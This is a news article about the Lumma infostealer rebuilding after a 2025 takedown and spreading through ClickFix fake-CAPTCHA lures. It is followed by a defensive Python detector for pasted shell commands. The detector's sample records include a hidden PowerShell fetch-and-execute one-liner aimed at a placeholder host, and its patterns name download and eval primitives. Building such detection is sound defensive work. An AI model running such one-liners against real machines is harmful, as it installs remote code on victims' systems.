Once-hobbled Lumma Stealer is back with lures that are hard to resist


Last May, law enforcement agencies around the world scored a significant victory when they disrupted the infrastructure of Lumma, an infostealer that had infected approximately 395,000 Windows computers in a single two-month period and prompted an international operation. Lumma is now back “in a big way” in a string of hard-to-detect attacks that steal credentials and sensitive files, researchers said Wednesday.

Lumma, also known as Lumma Stealer, first appeared on Russian-speaking cybercrime forums in 2022. Its cloud-based malware-as-a-service model provided a vast infrastructure of domains hosting free cracked software, games, and pirated movies, as well as attractive sites offering command-and-control channels and everything else a threat actor needed to run their infostealing enterprise. Within a year, Lumma was selling for up to $2,500 for premium versions. As of spring 2024, the FBI counted more than 21,000 listings on crime forums. Last year, Microsoft said Lumma had become the “go-to tool” for many criminal groups, including Scattered Spider, one of the most prolific of them.

Takedowns are hard

The FBI and an international coalition of its counterparts took action early last year. In May, they said they had seized 2,300 domains that made up the command-and-control infrastructure and the crime markets that had enabled the infostealer to flourish. The malware has nonetheless made a comeback in recent months and is re-infecting large numbers of machines.

“Despite a major law-enforcement takedown in 2025 that disrupted thousands of its command-and-control domains, Lummastealer is back at large,” researchers at security firm Bitdefender wrote. “The operation has rapidly rebuilt its infrastructure and is expanding around the world.”

As with Lumma before the takedown, the recent surge relies heavily on ClickFix, a type of social-engineering lure that has proven extremely effective at getting end users to infect their own machines. These lures typically take the form of fake CAPTCHAs, which ordinarily ask users to click a box or identify objects or letters in a jumbled image, but which instead instruct them to copy text and paste it into an interface, a process that takes only a few seconds. The text consists of malicious commands supplied by the fake CAPTCHA, and the interface is Windows Terminal. Targets that comply install a loader malware, which in turn installs Lumma.
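The ClickFix route described above leaves a recognisable trace in endpoint telemetry: a console host launched interactively by the user (via Windows Terminal or the shell) whose command line fetches and runs remote content. The detector below is an added example, not code from the article or from Bitdefender; the process-creation records are constructed, Sysmon-style samples with `example.invalid` hosts, and the field names and scoring threshold are assumptions for illustration.

```python
import re

# Console hosts a user reaches by pasting into Windows Terminal / the Run dialog (assumed list).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Traits of a pasted fetch-and-execute one-liner; a benign command rarely combines several.
INDICATORS = {
    "url": re.compile(r"https?://", re.I),
    "encoded_command": re.compile(r"\s-(?:enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_primitive": re.compile(
        r"downloadstring|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|\bcurl\b|\bmshta\b", re.I),
    "eval_primitive": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows path, e.g. 'explorer.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return (score, matched traits) for one process-creation record (Sysmon Event ID 1 shape)."""
    if basename(event["Image"]) not in SHELLS:
        return 0, []
    if basename(event["ParentImage"]) not in INTERACTIVE_PARENTS:
        return 0, []  # service- or script-spawned shells are a different detection
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    return len(hits), hits

def find_clickfix_candidates(events, threshold=3):
    """Flag interactive shells whose command line shows at least `threshold` traits."""
    flagged = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            flagged.append({"pid": ev["ProcessId"], "score": score, "traits": hits})
    return flagged

# Constructed sample records; paths and hosts are placeholders, not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Program Files\\WindowsApps\\Terminal\\WindowsTerminal.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr http://example.invalid/verify.txt)"'},
    {"ProcessId": 4188, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Program Files\\WindowsApps\\Terminal\\WindowsTerminal.exe",
     "CommandLine": "powershell.exe -NoLogo"},
    {"ProcessId": 4201, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "cmd.exe /c curl https://example.invalid/notes.txt -o notes.txt"},
    {"ProcessId": 4350, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": 'powershell.exe -c "iex (iwr http://example.invalid/task.txt)"'},
]

if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(hit)
```

The ordinary `curl` download scores two traits and stays below the threshold, while the hidden-window fetch-and-eval from Windows Terminal scores four; tune the threshold and trait list against your own baseline of interactive shell usage.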
